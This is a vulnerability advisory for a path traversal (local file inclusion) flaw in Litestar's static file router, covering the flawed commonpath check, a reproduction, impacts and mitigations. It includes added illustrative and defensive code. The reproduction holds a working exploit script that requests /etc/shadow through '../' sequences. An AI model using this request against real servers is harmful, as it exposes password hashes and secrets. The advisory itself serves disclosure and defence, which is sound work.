CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
AI Score
Confidence: High
EPSS
Percentile: 15.5%
Local File Inclusion via Path Traversal in LiteStar Static File Serving
A Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server.
The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at line 70 in litestar/static_files/base.py.
The function fails to properly validate the destination file path derived from user input, thereby permitting directory traversal. The critical code segment is as follows:

    commonpath([str(directory), file_info["name"], joined_path])

Given the variables:

    directory = PosixPath('/Users/brian/sandbox/test_vuln/static')
    file_info["name"] = '/Users/brian/sandbox/test_vuln/static/../requirements.txt'
    joined_path = PosixPath('/Users/brian/sandbox/test_vuln/static/../requirements.txt')

commonpath() returns '/Users/brian/sandbox/test_vuln/static', so the check incorrectly concludes that the requested file is confined to the static directory. Because the '..' component is never collapsed before the comparison, this validation lets a request traverse out of the directory, exposing the system to unauthorized file access.
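To make the failure mode concrete, here is an added example (not code from the advisory or from Litestar) that reproduces the lexical check with the advisory's own values and contrasts it with the same comparison after the path has been normalized. The constants STATIC_DIR, TRAVERSAL and BENIGN and the two function names are constructed for this illustration; PurePosixPath and posixpath are used instead of PosixPath so the snippet runs on any operating system without touching the disk, which is possible precisely because commonpath() never looks at the filesystem.

```python
import posixpath
from pathlib import PurePosixPath

# Constructed constants mirroring the values quoted in the advisory; nothing on
# disk is touched, because commonpath() is purely lexical and never consults it.
STATIC_DIR = "/Users/brian/sandbox/test_vuln/static"
TRAVERSAL = "../requirements.txt"   # client-controlled suffix that escapes STATIC_DIR
BENIGN = "logo.png"                 # a legitimate request for comparison


def flawed_commonpath_check(directory, requested):
    """Mirror of the pre-fix logic: the requested name is joined onto the
    directory without collapsing '..', then commonpath() is asked for the
    longest shared prefix of directory, file_info["name"] and joined_path.
    Returns (check_passes, commonpath_result)."""
    joined_path = str(PurePosixPath(directory) / requested)  # keeps the '..' component
    file_name = joined_path                                  # file_info["name"] holds the same string
    common = posixpath.commonpath([directory, file_name, joined_path])
    # commonpath() only drops '' and '.' components, so '..' survives and the
    # shared prefix is the whole static directory: the escape goes unnoticed.
    return common == directory, common


def normalized_commonpath_check(directory, requested):
    """The same comparison after normpath() has collapsed '..': the common
    prefix now reflects where the request really points, so the traversal
    case fails the check while the benign request still passes."""
    joined_path = posixpath.normpath(posixpath.join(directory, requested))
    common = posixpath.commonpath([directory, joined_path])
    return common == directory, common


if __name__ == "__main__":
    for label, check in (("flawed", flawed_commonpath_check),
                         ("normalized", normalized_commonpath_check)):
        for req in (TRAVERSAL, BENIGN):
            passes, common = check(STATIC_DIR, req)
            print(f"{label:10} {req:22} passes={passes!s:5} commonpath={common}")
```

Normalization is only the lexical half of the fix: a leading '..' survives normpath(), and a symlink inside the static directory can still point outside it, so a production check must also resolve the candidate against the real filesystem before comparing it with the root.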
To reproduce this vulnerability, follow these steps:
Set up the environment:
  - Install the uvicorn and litestar packages.
  - Create a static folder in the root directory of your project and place any file (e.g., an image) in it for testing.
Preparation of the testing environment:
  - Check that the server has a file such as /etc/shadow, which contains sensitive password information. If not, create a dummy sensitive file outside the static directory for testing.
  - Create a main.py file with the following content to configure and run the LiteStar server:

        from pathlib import Path
        from litestar import Litestar
        from litestar.static_files import create_static_files_router
        import uvicorn

        app = Litestar(
            route_handlers=[
                create_static_files_router(path="/static", directories=["static"]),
            ],
        )

        if __name__ == "__main__":
            uvicorn.run("main:app", host="0.0.0.0", port=8000)

  - Run python3 main.py to start the server.
Exploit:
  - Create an exploit.py file with the following Python code to perform the HTTP request without client-side sanitization:

        import http.client

        def send_request(host, port, path):
            connection = http.client.HTTPConnection(host, port)
            connection.request("GET", path)
            response = connection.getresponse()
            print(f"Status: {response.status}")
            print(f"Headers: {response.getheaders()}")
            data = response.read()
            print(f"Body: {data.decode('utf-8')}")
            connection.close()

        send_request("localhost", 8000, "/static/../../../../../../etc/shadow")

  - Run python3 exploit.py. This script uses direct HTTP connections to bypass client-side path sanitization present in tools like curl or web browsers.
Observe:
  - The server responds with the contents of the /etc/shadow file, thereby confirming the path traversal vulnerability.

This Local File Inclusion vulnerability critically affects all instances of LiteStar where the server has been configured to serve static files. By exploiting this vulnerability, unauthorized attackers can gain read access to any file that the server process has permission to access. Here are the specific impacts:
  - Exposure of Sensitive Information:
  - Potential for System Compromise: A .env file might reveal environment variables used for application configurations that include database passwords or API keys.
  - Credential Leakage: Files such as /etc/passwd or /etc/shadow (on Unix-like systems) could expose user credentials, which might be leveraged to perform further attacks, such as brute force attacks on user accounts or using stolen credentials to access other systems where the same credentials are reused.
  - Regulatory and Compliance Violations:
  - Loss of Trust and Reputation Damage:
  - Potential for Further Exploitation:
To effectively address the Local File Inclusion vulnerability via path traversal identified in the LiteStar application, it is essential to implement robust input validation and sanitization mechanisms. Below are specific strategies focused on managing user inputs and ensuring secure file path handling:
Input Validation and Sanitization:
  - Validate and sanitize user-supplied path components, rejecting sequences such as ../ which are used in path traversal attacks.
  - Path Normalization: Functions such as os.path.normpath() in Python can be used to normalize paths. This method resolves redundant separators and up-level references (../) to prevent directory traversal.
  - Reference implementation:

        if os.path.commonpath([full_path, directory]) != directory:
            # Don't allow misbehaving clients to break out of the static files
            # directory.
            continue

    This snippet from Starlette's implementation ensures that the constructed file path does not traverse out of the specified directory.
Naming Convention:
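The following is an added example, written for this page rather than taken from Litestar or Starlette, of how both mitigation items above combine into one framework-agnostic resolver: traversal sequences are refused outright (item 1), the remainder is normalized and then checked with the Starlette-style commonpath comparison (item 2), and a filesystem resolve() closes the gap normalization alone leaves open. The function name resolve_static_file, the REQUESTS list and the temporary directory fixture are constructed for the demonstration; it assumes a POSIX filesystem. It goes beyond the single ../ case in the advisory by also exercising percent-encoded traversal, client-supplied absolute paths, NUL-byte truncation and a symlink that points out of the static directory.

```python
import os
import shutil
import tempfile
from pathlib import Path
from urllib.parse import unquote


# Hypothetical helper, not Litestar's code: maps the path part of a request
# below a static route onto a file that must live inside static_dir.
def resolve_static_file(static_dir, request_path):
    """Return the resolved Path to serve, or None when the request must be refused."""
    root = Path(static_dir).resolve()
    decoded = unquote(request_path)           # '%2e%2e' becomes '..' before any check runs
    if "\x00" in decoded or "\\" in decoded:  # NUL truncation and Windows-style separators
        return None
    relative = decoded.lstrip("/")            # a client-supplied absolute path must not replace root
    if any(part == ".." for part in relative.split("/")):
        return None                           # item 1: refuse traversal sequences outright
    # item 2: lexical normalization, then a filesystem resolve() so a symlink
    # inside root that points outside it is followed and caught by commonpath.
    candidate = (root / os.path.normpath(relative)).resolve()
    if os.path.commonpath([str(root), str(candidate)]) != str(root):
        return None                           # Starlette-style containment check
    if not candidate.is_file():
        return None
    return candidate


# Constructed request paths, each stripped of the "/static" route prefix.
REQUESTS = [
    "/index.html",              # legitimate file inside the static directory
    "/sub/../index.html",       # '..' that would stay inside root, still refused by item 1
    "/../secret.txt",           # plain traversal out of the static directory
    "/%2e%2e/secret.txt",       # percent-encoded traversal
    "//etc/passwd",             # client-supplied absolute path
    "/index.html%00.png",       # NUL-byte truncation attempt
    "/link.txt",                # symlink inside static pointing outside it
]


def run_demo():
    """Build a throwaway fixture, run every entry of REQUESTS through the
    resolver and return {request: path relative to static, or None}."""
    base = Path(tempfile.mkdtemp(prefix="static-demo-"))
    try:
        static = base / "static"
        static.mkdir()
        (static / "index.html").write_text("<h1>ok</h1>\n")
        (base / "secret.txt").write_text("not for clients\n")  # constructed stand-in for a sensitive file
        try:
            (static / "link.txt").symlink_to(base / "secret.txt")
        except OSError:
            pass  # symlinks unavailable (e.g. unprivileged Windows); the request is then refused as missing
        root = static.resolve()
        results = {}
        for req in REQUESTS:
            found = resolve_static_file(static, req)
            results[req] = found.relative_to(root).as_posix() if found else None
        return results
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for req, served in run_demo().items():
        print(f"{req:22} -> {served or 'refused'}")
```

Only the plain "/index.html" request maps to a file; every other entry is refused, and the symlink case is the one that neither the '..' filter nor normpath() alone would catch, which is why the resolve() plus commonpath() step stays in even after stricter input validation is added.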
Feature Additions and Changes:
Vendor | Product | Version | CPE |
---|---|---|---|
starliteproject | starlite | * | cpe:2.3:a:starliteproject:starlite:*:*:*:*:*:*:*:* |
* | litestar | * | cpe:2.3:a:*:litestar:*:*:*:*:*:*:*:* |
github.com/advisories/GHSA-83pv-qr33-2vcf
github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70
github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b
github.com/litestar-org/litestar/commit/a07b79b84d8717bec5ac4d4674c1e4920ba9c813
github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf
nvd.nist.gov/vuln/detail/CVE-2024-32982